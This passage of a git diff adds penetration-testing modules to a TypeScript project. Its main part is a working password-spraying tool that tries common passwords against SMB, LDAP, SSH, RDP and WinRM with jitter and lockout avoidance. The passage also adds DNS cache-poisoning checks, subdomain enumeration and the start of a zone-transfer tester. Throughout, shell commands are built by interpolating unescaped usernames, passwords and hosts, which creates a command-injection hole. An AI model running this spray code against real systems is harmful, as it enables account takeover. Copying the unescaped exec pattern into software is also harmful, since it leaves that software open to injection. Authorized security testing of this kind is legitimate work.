+    return Object.keys(DEFAULT_CREDENTIALS)
+  }
+
+  /**
+   * Add custom credentials for a service.
+   */
+  export function addCustomCredentials(service: string, creds: DefaultCredential[]): void {
+    const normalized = service.toLowerCase()
+    if (!DEFAULT_CREDENTIALS[normalized]) {
+      DEFAULT_CREDENTIALS[normalized] = []
+    }
+    DEFAULT_CREDENTIALS[normalized].push(...creds)
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/creds/index.ts b/packages/opencode/src/pentest/netscan/creds/index.ts
new file mode 100644
index 00000000000..02c733f6f16
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/creds/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Credential Module Exports
+ *
+ * Export all credential testing functionality.
+ *
+ * @module pentest/netscan/creds
+ */
+
+export { DefaultCreds, DEFAULT_CREDENTIALS } from "./defaults"
+export type { DefaultCredential, DefaultTestOptions } from "./defaults"
+
+export { PasswordSpray } from "./spray"
+export type { SprayOptions, SprayTarget, SprayResult } from "./spray"
diff --git a/packages/opencode/src/pentest/netscan/creds/spray.ts b/packages/opencode/src/pentest/netscan/creds/spray.ts
new file mode 100644
index 00000000000..f14f45f42d4
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/creds/spray.ts
@@ -0,0 +1,417 @@
+/**
+ * @fileoverview Password Spraying
+ *
+ * Password spraying attacks with lockout awareness.
+ *
+ * @module pentest/netscan/creds/spray
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.creds.spray" })
+
+/**
+ * Spray options.
+ */
+export interface SprayOptions {
+  timeout?: number
+  delayBetweenAttempts?: number
+  delayBetweenPasswords?: number
+  lockoutThreshold?: number
+  observationWindow?: number
+  jitter?: number
+}
+
+/**
+ * Spray target.
+ */
+export interface SprayTarget {
+  host: string
+  port: number
+  service: string
+  domain?: string
+}
+
+/**
+ * Spray result.
+ */
+export interface SprayResult {
+  target: SprayTarget
+  tested: number
+  valid: NetScanTypes.CredentialResult[]
+  locked: string[]
+  findings: string[]
+}
+
+/**
+ * Common spray passwords.
+ */
+const COMMON_PASSWORDS = [
+  "Password1",
+  "Password123",
+  "Welcome1",
+  "Welcome123",
+  "Summer2024",
+  "Winter2024",
+  "Spring2024",
+  "Fall2024",
+  "Company123",
+  "Passw0rd",
+  "P@ssw0rd",
+  "Password1!",
+  "Qwerty123",
+  "123456",
+  "admin",
+  "letmein",
+  "changeme",
+]
+
+/**
+ * Password spraying namespace.
+ */
+export namespace PasswordSpray {
+  /**
+   * Perform password spray attack.
+   */
+  export async function spray(
+    target: SprayTarget,
+    usernames: string[],
+    passwords?: string[],
+    options: SprayOptions = {}
+  ): Promise<SprayResult> {
+    const passwordList = passwords || COMMON_PASSWORDS
+    const delayBetweenAttempts = options.delayBetweenAttempts || 100
+    const delayBetweenPasswords = options.delayBetweenPasswords || 30000 // 30 seconds between passwords
+    const lockoutThreshold = options.lockoutThreshold || 5
+    const observationWindow = options.observationWindow || 30 // minutes
+    const jitter = options.jitter || 1000
+
+    log.info("Starting password spray", {
+      host: target.host,
+      service: target.service,
+      userCount: usernames.length,
+      passwordCount: passwordList.length,
+    })
+
+    const result: SprayResult = {
+      target,
+      tested: 0,
+      valid: [],
+      locked: [],
+      findings: [],
+    }
+
+    // Track attempts per user for lockout awareness
+    const attemptCounts = new Map<string, number>()
+    const lastAttemptTime = new Map<string, number>()
+
+    for (const password of passwordList) {
+      log.info("Spraying password", {
+        password: password.substring(0, 3) + "***",
+        userCount: usernames.length,
+      })
+
+      for (const username of usernames) {
+        // Skip if user is locked
+        if (result.locked.includes(username)) {
+          continue
+        }
+
+        // Check lockout window
+        const attempts = attemptCounts.get(username) || 0
+        const lastAttempt = lastAttemptTime.get(username) || 0
+        const timeSinceLastAttempt = Date.now() - lastAttempt
+
+        // Reset counter if observation window passed
+        if (timeSinceLastAttempt > observationWindow * 60 * 1000) {
+          attemptCounts.set(username, 0)
+        }
+
+        // Skip if approaching lockout
+        if (attempts >= lockoutThreshold - 1) {
+          log.debug("Skipping user to avoid lockout", { username, attempts })
+          continue
+        }
+
+        // Add jitter
+        if (jitter > 0) {
+          await sleep(Math.random() * jitter)
+        }
+
+        try {
+          const valid = await testCredential(target, username, password, options.timeout || 10000)
+          result.tested++
+
+          attemptCounts.set(username, (attemptCounts.get(username) || 0) + 1)
+          lastAttemptTime.set(username, Date.now())
+
+          if (valid) {
+            const credential: NetScanTypes.CredentialResult = {
+              id: `cred_spray_${Date.now()}_${Math.random().toString(36).slice(2)}`,
+              host: target.host,
+              service: target.service as NetScanTypes.ServiceType,
+              port: target.port,
+              username,
+              password,
+              method: "spray",
+              valid: true,
+              admin: false,
+              timestamp: Date.now(),
+            }
+
+            result.valid.push(credential)
+            result.findings.push(`Valid credential: ${username}:${password}`)
+
+            log.info("Valid credential found via spray", { host: target.host, username })
+          }
+        } catch (err) {
+          const errorStr = String(err)
+
+          // Check for lockout indicators
+          if (
+            errorStr.includes("locked") ||
+            errorStr.includes("LOCKED") ||
+            errorStr.includes("too many")
+          ) {
+            result.locked.push(username)
+            result.findings.push(`Account locked: ${username}`)
+            log.warn("Account appears locked", { username })
+          }
+        }
+
+        // Delay between attempts
+        await sleep(delayBetweenAttempts)
+      }
+
+      // Longer delay between passwords
+      if (passwordList.indexOf(password) < passwordList.length - 1) {
+        log.info("Waiting before next password", { delay: delayBetweenPasswords })
+        await sleep(delayBetweenPasswords)
+      }
+    }
+
+    result.findings.push(`Tested ${result.tested} combinations`)
+    result.findings.push(`Found ${result.valid.length} valid credentials`)
+    if (result.locked.length > 0) {
+      result.findings.push(`${result.locked.length} accounts were locked during spray`)
+    }
+
+    log.info("Password spray complete", {
+      tested: result.tested,
+      valid: result.valid.length,
+      locked: result.locked.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Test a credential against the target.
+   */
+  async function testCredential(
+    target: SprayTarget,
+    username: string,
+    password: string,
+    timeout: number
+  ): Promise<boolean> {
+    const fullUsername = target.domain ? `${target.domain}\\${username}` : username
+
+    switch (target.service.toLowerCase()) {
+      case "smb":
+        return testSMB(target.host, fullUsername, password, timeout)
+      case "ldap":
+      case "ad":
+        return testLDAP(target.host, target.port, username, password, target.domain, timeout)
+      case "ssh":
+        return testSSH(target.host, target.port, username, password, timeout)
+      case "rdp":
+        return testRDP(target.host, target.port, fullUsername, password, timeout)
+      case "winrm":
+        return testWinRM(target.host, fullUsername, password, timeout)
+      default:
+        return false
+    }
+  }
+
+  /**
+   * Test SMB credentials.
+   */
+  async function testSMB(
+    host: string,
+    username: string,
+    password: string,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `smbclient -L //${host} -U '${username}%${password}' 2>&1`,
+        { timeout }
+      )
+      const output = stdout + stderr
+      return (
+        !output.includes("NT_STATUS_LOGON_FAILURE") &&
+        !output.includes("NT_STATUS_ACCOUNT_LOCKED_OUT") &&
+        !output.includes("NT_STATUS_ACCESS_DENIED")
+      )
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test LDAP credentials.
+   */
+  async function testLDAP(
+    host: string,
+    port: number,
+    username: string,
+    password: string,
+    domain: string | undefined,
+    timeout: number
+  ): Promise<boolean> {
+    const bindDN = domain ? `${username}@${domain}` : username
+
+    try {
+      const { stdout, stderr } = await execAsync(
+        `ldapsearch -x -H 'ldap://${host}:${port}' -D '${bindDN}' -w '${password}' -b '' -s base '(objectClass=*)' 2>&1`,
+        { timeout }
+      )
+      const output = stdout + stderr
+      return !output.includes("Invalid credentials") && !output.includes("Can't contact")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test SSH credentials.
+   */
+  async function testSSH(
+    host: string,
+    port: number,
+    username: string,
+    password: string,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `sshpass -p '${password}' ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 -p ${port} '${username}@${host}' 'echo success' 2>&1`,
+        { timeout }
+      )
+      return (stdout + stderr).includes("success")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test RDP credentials.
+   */
+  async function testRDP(
+    host: string,
+    port: number,
+    username: string,
+    password: string,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `xfreerdp /v:${host}:${port} /u:'${username}' /p:'${password}' /cert-ignore +auth-only 2>&1`,
+        { timeout }
+      )
+      const output = stdout + stderr
+      return output.includes("Authentication only") && !output.includes("ERRCONNECT")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test WinRM credentials.
+   */
+  async function testWinRM(
+    host: string,
+    username: string,
+    password: string,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `crackmapexec winrm ${host} -u '${username}' -p '${password}' 2>&1`,
+        { timeout }
+      )
+      return (stdout + stderr).includes("Pwn3d!")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Get common passwords.
+   */
+  export function getCommonPasswords(): string[] {
+    return [...COMMON_PASSWORDS]
+  }
+
+  /**
+   * Generate seasonal passwords.
+   */
+  export function generateSeasonalPasswords(year?: number): string[] {
+    const y = year || new Date().getFullYear()
+    return [
+      `Spring${y}`,
+      `Summer${y}`,
+      `Fall${y}`,
+      `Winter${y}`,
+      `Spring${y}!`,
+      `Summer${y}!`,
+      `Fall${y}!`,
+      `Winter${y}!`,
+    ]
+  }
+
+  /**
+   * Sleep for a given number of milliseconds.
+   */
+  function sleep(ms: number): Promise<void> {
+    return new Promise((resolve) => setTimeout(resolve, ms))
+  }
+
+  /**
+   * Format spray results for display.
+   */
+  export function formatResults(result: SprayResult): string {
+    const lines: string[] = []
+
+    lines.push(`Password Spray Results: ${result.target.host}`)
+    lines.push(`Service: ${result.target.service}`)
+    lines.push(`Combinations Tested: ${result.tested}`)
+    lines.push("")
+
+    if (result.valid.length > 0) {
+      lines.push("Valid Credentials:")
+      for (const cred of result.valid) {
+        lines.push(`  ${cred.username}:${cred.password}`)
+      }
+      lines.push("")
+    }
+
+    if (result.locked.length > 0) {
+      lines.push("Locked Accounts:")
+      for (const user of result.locked) {
+        lines.push(`  ${user}`)
+      }
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/dns/cache.ts b/packages/opencode/src/pentest/netscan/dns/cache.ts
new file mode 100644
index 00000000000..e82b82ff3cb
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/dns/cache.ts
@@ -0,0 +1,330 @@
+/**
+ * @fileoverview DNS Cache Poisoning Checks
+ *
+ * Test for DNS cache poisoning vulnerabilities.
+ *
+ * @module pentest/netscan/dns/cache
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.dns.cache" })
+
+/**
+ * Cache poisoning check options.
+ */
+export interface CachePoisonOptions {
+  timeout?: number
+  checkRecursion?: boolean
+  checkSourcePort?: boolean
+  checkTxid?: boolean
+}
+
+/**
+ * Cache poisoning vulnerability.
+ */
+export interface CachePoisonVuln {
+  type: "recursion" | "predictable_txid" | "predictable_port" | "open_resolver"
+  severity: "critical" | "high" | "medium" | "low"
+  description: string
+}
+
+/**
+ * Cache poisoning check result.
+ */
+export interface CachePoisonResult {
+  nameserver: string
+  vulnerabilities: CachePoisonVuln[]
+  recursionEnabled: boolean
+  isOpenResolver: boolean
+  sourcePortRandomization: boolean
+  txidRandomization: boolean
+  findings: string[]
+}
+
+/**
+ * DNS cache namespace.
+ */
+export namespace DNSCache {
+  /**
+   * Check for cache poisoning vulnerabilities.
+   */
+  export async function check(
+    nameserver: string,
+    options: CachePoisonOptions = {}
+  ): Promise<CachePoisonResult> {
+    const timeout = options.timeout || 30000
+
+    const result: CachePoisonResult = {
+      nameserver,
+      vulnerabilities: [],
+      recursionEnabled: false,
+      isOpenResolver: false,
+      sourcePortRandomization: true,
+      txidRandomization: true,
+      findings: [],
+    }
+
+    log.info("Checking DNS cache poisoning", { nameserver })
+
+    // Check recursion
+    if (options.checkRecursion !== false) {
+      try {
+        const recursion = await checkRecursion(nameserver, timeout)
+        result.recursionEnabled = recursion.enabled
+        result.isOpenResolver = recursion.isOpen
+
+        if (recursion.isOpen) {
+          result.vulnerabilities.push({
+            type: "open_resolver",
+            severity: "high",
+            description: "DNS server allows recursive queries from any source (open resolver)",
+          })
+          result.findings.push("Open DNS resolver detected - can be abused for DDoS amplification")
+        }
+
+        if (recursion.enabled) {
+          result.vulnerabilities.push({
+            type: "recursion",
+            severity: "medium",
+            description: "DNS server has recursion enabled",
+          })
+        }
+      } catch (err) {
+        log.debug("Recursion check failed", { nameserver, error: String(err) })
+      }
+    }
+
+    // Check source port randomization
+    if (options.checkSourcePort !== false) {
+      try {
+        const portRandom = await checkSourcePortRandomization(nameserver, timeout)
+        result.sourcePortRandomization = portRandom.randomized
+
+        if (!portRandom.randomized) {
+          result.vulnerabilities.push({
+            type: "predictable_port",
+            severity: "critical",
+            description: `DNS server uses predictable source ports (${portRandom.ports.join(", ")})`,
+          })
+          result.findings.push(
+            "Source port randomization is weak - vulnerable to Kaminsky-style attacks"
+          )
+        }
+      } catch (err) {
+        log.debug("Source port check failed", { nameserver, error: String(err) })
+      }
+    }
+
+    // Check transaction ID randomization
+    if (options.checkTxid !== false) {
+      try {
+        const txidRandom = await checkTxidRandomization(nameserver, timeout)
+        result.txidRandomization = txidRandom.randomized
+
+        if (!txidRandom.randomized) {
+          result.vulnerabilities.push({
+            type: "predictable_txid",
+            severity: "critical",
+            description: "DNS server uses predictable transaction IDs",
+          })
+          result.findings.push("Transaction ID randomization is weak")
+        }
+      } catch (err) {
+        log.debug("TXID check failed", { nameserver, error: String(err) })
+      }
+    }
+
+    log.info("DNS cache poisoning check complete", {
+      nameserver,
+      vulnCount: result.vulnerabilities.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Check if recursion is enabled.
+   */
+  async function checkRecursion(
+    nameserver: string,
+    timeout: number
+  ): Promise<{ enabled: boolean; isOpen: boolean }> {
+    // Try to resolve an external domain
+    const testDomain = "www.google.com"
+
+    try {
+      const { stdout } = await execAsync(
+        `dig @${nameserver} ${testDomain} +short +recurse 2>&1`,
+        { timeout }
+      )
+
+      // If we get an IP, recursion is working
+      if (/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(stdout.trim().split("\n")[0])) {
+        return { enabled: true, isOpen: true }
+      }
+
+      // Check response flags
+      const { stdout: flagsOutput } = await execAsync(
+        `dig @${nameserver} ${testDomain} +noall +comments 2>&1`,
+        { timeout }
+      )
+
+      const raEnabled = flagsOutput.includes("ra") // Recursion Available
+      return { enabled: raEnabled, isOpen: raEnabled }
+    } catch {
+      return { enabled: false, isOpen: false }
+    }
+  }
+
+  /**
+   * Check source port randomization.
+   */
+  async function checkSourcePortRandomization(
+    nameserver: string,
+    timeout: number
+  ): Promise<{ randomized: boolean; ports: number[] }> {
+    const ports: number[] = []
+    const testDomain = "porttest.dns-oarc.net"
+
+    // Make multiple queries and collect source ports
+    for (let i = 0; i < 5; i++) {
+      try {
+        const { stdout } = await execAsync(
+          `dig @${nameserver} +short ${i}.${testDomain} TXT 2>/dev/null`,
+          { timeout: 5000 }
+        )
+
+        // Parse port from response
+        const portMatch = stdout.match(/(\d{1,5})/)
+        if (portMatch) {
+          ports.push(parseInt(portMatch[1], 10))
+        }
+      } catch {
+        // Query failed
+      }
+    }
+
+    // Check if ports are randomized
+    if (ports.length < 2) {
+      return { randomized: true, ports: [] } // Can't determine
+    }
+
+    // Check for sequential or predictable patterns
+    const uniquePorts = new Set(ports)
+    const isRandomized = uniquePorts.size > 2 // At least 3 different ports
+
+    // Check for sequential ports
+    const sortedPorts = [...ports].sort((a, b) => a - b)
+    let isSequential = true
+    for (let i = 1; i < sortedPorts.length; i++) {
+      if (sortedPorts[i] - sortedPorts[i - 1] > 10) {
+        isSequential = false
+        break
+      }
+    }
+
+    return {
+      randomized: isRandomized && !isSequential,
+      ports,
+    }
+  }
+
+  /**
+   * Check transaction ID randomization.
+   */
+  async function checkTxidRandomization(
+    nameserver: string,
+    timeout: number
+  ): Promise<{ randomized: boolean; txids: number[] }> {
+    const txids: number[] = []
+
+    // Make multiple queries and try to capture TXIDs
+    // This is a simplified check - full testing would require packet capture
+    for (let i = 0; i < 5; i++) {
+      try {
+        const { stdout } = await execAsync(
+          `dig @${nameserver} +noall +comments test${i}.example.com 2>&1`,
+          { timeout: 5000 }
+        )
+
+        // Try to extract TXID from dig output
+        const txidMatch = stdout.match(/id:\s*(\d+)/i)
+        if (txidMatch) {
+          txids.push(parseInt(txidMatch[1], 10))
+        }
+      } catch {
+        // Query failed
+      }
+    }
+
+    // Check for randomization
+    if (txids.length < 2) {
+      return { randomized: true, txids: [] } // Can't determine
+    }
+
+    const uniqueTxids = new Set(txids)
+    const isRandomized = uniqueTxids.size === txids.length // All should be unique
+
+    return { randomized: isRandomized, txids }
+  }
+
+  /**
+   * Use DNS OARC's test service.
+   */
+  export async function checkWithOARC(
+    nameserver: string,
+    timeout: number = 30000
+  ): Promise<{ portScore?: string; txidScore?: string; rating?: string }> {
+    try {
+      const { stdout } = await execAsync(
+        `dig @${nameserver} +short porttest.dns-oarc.net TXT 2>/dev/null`,
+        { timeout }
+      )
+
+      // Parse OARC response
+      const portMatch = stdout.match(/ports.*?(\w+)/i)
+      const result: { portScore?: string; txidScore?: string; rating?: string } = {}
+
+      if (portMatch) {
+        result.portScore = portMatch[1]
+      }
+
+      return result
+    } catch {
+      return {}
+    }
+  }
+
+  /**
+   * Format cache poisoning results for display.
+   */
+  export function formatResults(result: CachePoisonResult): string {
+    const lines: string[] = []
+
+    lines.push(`DNS Cache Poisoning Check: ${result.nameserver}`)
+    lines.push("")
+    lines.push(`Recursion Enabled: ${result.recursionEnabled ? "Yes" : "No"}`)
+    lines.push(`Open Resolver: ${result.isOpenResolver ? "Yes (VULNERABLE)" : "No"}`)
+    lines.push(`Source Port Randomization: ${result.sourcePortRandomization ? "Good" : "WEAK"}`)
+    lines.push(`TXID Randomization: ${result.txidRandomization ? "Good" : "WEAK"}`)
+    lines.push("")
+
+    if (result.vulnerabilities.length > 0) {
+      lines.push("Vulnerabilities:")
+      for (const vuln of result.vulnerabilities) {
+        lines.push(`  [${vuln.severity.toUpperCase()}] ${vuln.type}: ${vuln.description}`)
+      }
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/dns/enum.ts b/packages/opencode/src/pentest/netscan/dns/enum.ts
new file mode 100644
index 00000000000..9ba7864953b
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/dns/enum.ts
@@ -0,0 +1,447 @@
+/**
+ * @fileoverview DNS Subdomain Enumeration
+ *
+ * Enumerate subdomains using various techniques.
+ *
+ * @module pentest/netscan/dns/enum
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.dns.enum" })
+
+/**
+ * Subdomain enumeration options.
+ */
+export interface SubdomainEnumOptions {
+  wordlist?: string[]
+  timeout?: number
+  threads?: number
+  resolver?: string
+  bruteForce?: boolean
+  useExternal?: boolean
+}
+
+/**
+ * Discovered subdomain.
+ */
+export interface DiscoveredSubdomain {
+  subdomain: string
+  fullDomain: string
+  ip?: string
+  cname?: string
+  source: "brute" | "wordlist" | "external" | "wildcard"
+}
+
+/**
+ * Subdomain enumeration result.
+ */
+export interface SubdomainEnumResult {
+  domain: string
+  subdomains: DiscoveredSubdomain[]
+  wildcardDetected: boolean
+  wildcardIp?: string
+  findings: string[]
+}
+
+/**
+ * Common subdomain wordlist.
+ */
+const DEFAULT_WORDLIST = [
+  "www",
+  "mail",
+  "ftp",
+  "webmail",
+  "smtp",
+  "pop",
+  "ns1",
+  "ns2",
+  "ns3",
+  "dns",
+  "dns1",
+  "dns2",
+  "mx",
+  "mx1",
+  "mx2",
+  "api",
+  "dev",
+  "staging",
+  "test",
+  "admin",
+  "portal",
+  "vpn",
+  "remote",
+  "secure",
+  "login",
+  "m",
+  "mobile",
+  "app",
+  "apps",
+  "beta",
+  "demo",
+  "git",
+  "gitlab",
+  "github",
+  "jenkins",
+  "ci",
+  "cd",
+  "jira",
+  "confluence",
+  "wiki",
+  "docs",
+  "help",
+  "support",
+  "blog",
+  "news",
+  "shop",
+  "store",
+  "cdn",
+  "static",
+  "assets",
+  "img",
+  "images",
+  "media",
+  "video",
+  "files",
+  "download",
+  "uploads",
+  "backup",
+  "old",
+  "new",
+  "web",
+  "www1",
+  "www2",
+  "web1",
+  "web2",
+  "server",
+  "server1",
+  "server2",
+  "db",
+  "database",
+  "mysql",
+  "postgres",
+  "mongodb",
+  "redis",
+  "elastic",
+  "elasticsearch",
+  "kibana",
+  "grafana",
+  "prometheus",
+  "monitoring",
+  "status",
+  "health",
+  "metrics",
+  "logs",
+  "sentry",
+  "analytics",
+  "track",
+  "tracking",
+  "oauth",
+  "auth",
+  "sso",
+  "identity",
+  "accounts",
+  "account",
+  "user",
+  "users",
+  "customer",
+  "customers",
+  "internal",
+  "intranet",
+  "extranet",
+  "partner",
+  "partners",
+  "vendor",
+  "vendors",
+  "exchange",
+  "owa",
+  "autodiscover",
+  "lyncdiscover",
+  "sip",
+  "meet",
+  "teams",
+  "sharepoint",
+  "onedrive",
+]
+
+/**
+ * DNS enumeration namespace.
+ */
+export namespace DNSEnum {
+  /**
+   * Enumerate subdomains for a domain.
+   */
+  export async function enumerate(
+    domain: string,
+    options: SubdomainEnumOptions = {}
+  ): Promise<SubdomainEnumResult> {
+    const timeout = options.timeout || 60000
+    const wordlist = options.wordlist || DEFAULT_WORDLIST
+    const resolver = options.resolver
+
+    const result: SubdomainEnumResult = {
+      domain,
+      subdomains: [],
+      wildcardDetected: false,
+      findings: [],
+    }
+
+    log.info("Starting subdomain enumeration", { domain })
+
+    // Check for wildcard DNS
+    const wildcard = await checkWildcard(domain, resolver, timeout)
+    result.wildcardDetected = wildcard.detected
+    result.wildcardIp = wildcard.ip
+
+    if (wildcard.detected) {
+      result.findings.push(`Wildcard DNS detected: *.${domain} -> ${wildcard.ip}`)
+    }
+
+    // Brute-force with wordlist
+    if (options.bruteForce !== false) {
+      const bruteResults = await bruteForce(domain, wordlist, resolver, timeout, wildcard.ip)
+      result.subdomains.push(...bruteResults)
+    }
+
+    // Use external sources
+    if (options.useExternal) {
+      try {
+        const externalResults = await enumerateExternal(domain, timeout)
+        // Merge unique subdomains
+        for (const sub of externalResults) {
+          if (!result.subdomains.find((s) => s.subdomain === sub.subdomain)) {
+            result.subdomains.push(sub)
+          }
+        }
+      } catch (err) {
+        log.debug("External enumeration failed", { domain, error: String(err) })
+      }
+    }
+
+    result.findings.push(`Discovered ${result.subdomains.length} subdomains`)
+
+    log.info("Subdomain enumeration complete", {
+      domain,
+      subdomainCount: result.subdomains.length,
+      wildcardDetected: result.wildcardDetected,
+    })
+
+    return result
+  }
+
+  /**
+   * Check for wildcard DNS.
+   */
+  async function checkWildcard(
+    domain: string,
+    resolver: string | undefined,
+    timeout: number
+  ): Promise<{ detected: boolean; ip?: string }> {
+    // Generate random subdomain
+    const random = Math.random().toString(36).substring(2, 15)
+    const testDomain = `${random}.${domain}`
+
+    try {
+      const ip = await resolveHost(testDomain, resolver, timeout)
+      if (ip) {
+        return { detected: true, ip }
+      }
+    } catch {
+      // No wildcard
+    }
+
+    return { detected: false }
+  }
+
+  /**
+   * Brute-force subdomains with wordlist.
+   */
+  async function bruteForce(
+    domain: string,
+    wordlist: string[],
+    resolver: string | undefined,
+    timeout: number,
+    wildcardIp?: string
+  ): Promise<DiscoveredSubdomain[]> {
+    const results: DiscoveredSubdomain[] = []
+    const batchSize = 10
+
+    for (let i = 0; i < wordlist.length; i += batchSize) {
+      const batch = wordlist.slice(i, i + batchSize)
+      const promises = batch.map(async (sub) => {
+        const fullDomain = `${sub}.${domain}`
+        try {
+          const ip = await resolveHost(fullDomain, resolver, 5000)
+          if (ip && ip !== wildcardIp) {
+            return {
+              subdomain: sub,
+              fullDomain,
+              ip,
+              source: "wordlist" as const,
+            }
+          }
+        } catch {
+          // Not resolved
+        }
+        return null
+      })
+
+      const batchResults = await Promise.all(promises)
+      for (const result of batchResults) {
+        if (result) {
+          results.push(result)
+        }
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Resolve hostname to IP.
+   */
+  async function resolveHost(
+    host: string,
+    resolver: string | undefined,
+    timeout: number
+  ): Promise<string | null> {
+    const cmd = resolver
+      ? `dig @${resolver} +short ${host} A 2>/dev/null`
+      : `dig +short ${host} A 2>/dev/null`
+
+    try {
+      const { stdout } = await execAsync(cmd, { timeout })
+      const ip = stdout.trim().split("\n")[0]
+      if (ip && /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(ip)) {
+        return ip
+      }
+    } catch {
+      // Resolution failed
+    }
+
+    return null
+  }
+
+  /**
+   * Enumerate using external sources.
+   */
+  async function enumerateExternal(
+    domain: string,
+    timeout: number
+  ): Promise<DiscoveredSubdomain[]> {
+    const results: DiscoveredSubdomain[] = []
+
+    // Try crt.sh (Certificate Transparency)
+    try {
+      const crtResults = await queryCrtSh(domain, timeout)
+      results.push(...crtResults)
+    } catch {
+      // crt.sh failed
+    }
+
+    return results
+  }
+
+  /**
+   * Query crt.sh for subdomains.
+   */
+  async function queryCrtSh(domain: string, timeout: number): Promise<DiscoveredSubdomain[]> {
+    const results: DiscoveredSubdomain[] = []
+
+    try {
+      const { stdout } = await execAsync(
+        `curl -s "https://crt.sh/?q=%.${domain}&output=json" 2>/dev/null | grep -oP '"name_value":"[^"]*"' | cut -d'"' -f4 | sort -u`,
+        { timeout }
+      )
+
+      const lines = stdout.split("\n").filter((l) => l.trim())
+      const seen = new Set<string>()
+
+      for (const line of lines) {
+        const name = line.toLowerCase().trim()
+        if (name.endsWith(domain) && !seen.has(name)) {
+          seen.add(name)
+          const subdomain = name.slice(0, -(domain.length + 1))
+          if (subdomain && !subdomain.includes("*")) {
+            results.push({
+              subdomain,
+              fullDomain: name,
+              source: "external",
+            })
+          }
+        }
+      }
+    } catch {
+      // crt.sh query failed
+    }
+
+    return results
+  }
+
+  /**
+   * Resolve all discovered subdomains.
+   */
+  export async function resolveAll(
+    subdomains: DiscoveredSubdomain[],
+    resolver?: string
+  ): Promise<DiscoveredSubdomain[]> {
+    const resolved: DiscoveredSubdomain[] = []
+
+    for (const sub of subdomains) {
+      if (sub.ip) {
+        resolved.push(sub)
+        continue
+      }
+
+      try {
+        const ip = await resolveHost(sub.fullDomain, resolver, 5000)
+        resolved.push({ ...sub, ip: ip || undefined })
+      } catch {
+        resolved.push(sub)
+      }
+    }
+
+    return resolved
+  }
+
+  /**
+   * Get the default wordlist.
+   */
+  export function getDefaultWordlist(): string[] {
+    return [...DEFAULT_WORDLIST]
+  }
+
+  /**
+   * Format enumeration results for display.
+   */
+  export function formatResults(result: SubdomainEnumResult): string {
+    const lines: string[] = []
+
+    lines.push(`Subdomain Enumeration Results for ${result.domain}`)
+    lines.push(`Total: ${result.subdomains.length} subdomains`)
+
+    if (result.wildcardDetected) {
+      lines.push(`[!] Wildcard DNS detected: ${result.wildcardIp}`)
+    }
+
+    lines.push("")
+    lines.push("| Subdomain | Full Domain | IP | Source |")
+    lines.push("|-----------|-------------|-------|--------|")
+
+    for (const sub of result.subdomains) {
+      lines.push(
+        `| ${sub.subdomain} | ${sub.fullDomain} | ${sub.ip || "-"} | ${sub.source} |`
+      )
+    }
+
+    lines.push("")
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/dns/index.ts b/packages/opencode/src/pentest/netscan/dns/index.ts
new file mode 100644
index 00000000000..7239fb9ed3c
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/dns/index.ts
@@ -0,0 +1,16 @@
+/**
+ * @fileoverview DNS Module Exports
+ *
+ * Export all DNS testing functionality.
+ *
+ * @module pentest/netscan/dns
+ */
+
+export { DNSZone } from "./zone"
+export type { ZoneTransferOptions, ZoneTransferResult } from "./zone"
+
+export { DNSEnum } from "./enum"
+export type { SubdomainEnumOptions, DiscoveredSubdomain, SubdomainEnumResult } from "./enum"
+
+export { DNSCache } from "./cache"
+export type { CachePoisonOptions, CachePoisonVuln, CachePoisonResult } from "./cache"
diff --git a/packages/opencode/src/pentest/netscan/dns/zone.ts b/packages/opencode/src/pentest/netscan/dns/zone.ts
new file mode 100644
index 00000000000..c7b55f8be6e
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/dns/zone.ts
@@ -0,0 +1,342 @@
+/**
+ * @fileoverview DNS Zone Transfer Testing
+ *
+ * Test for AXFR zone transfers and extract DNS records.
+ *
+ * @module pentest/netscan/dns/zone
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.dns.zone" })
+
+/**
+ * Zone transfer options.
+ */
+export interface ZoneTransferOptions {
+  nameserver?: string
+  timeout?: number
+}
+
+/**
+ * Zone transfer result.
+ */
+export interface ZoneTransferResult {
+  domain: string
+  nameserver: string
+  success: boolean
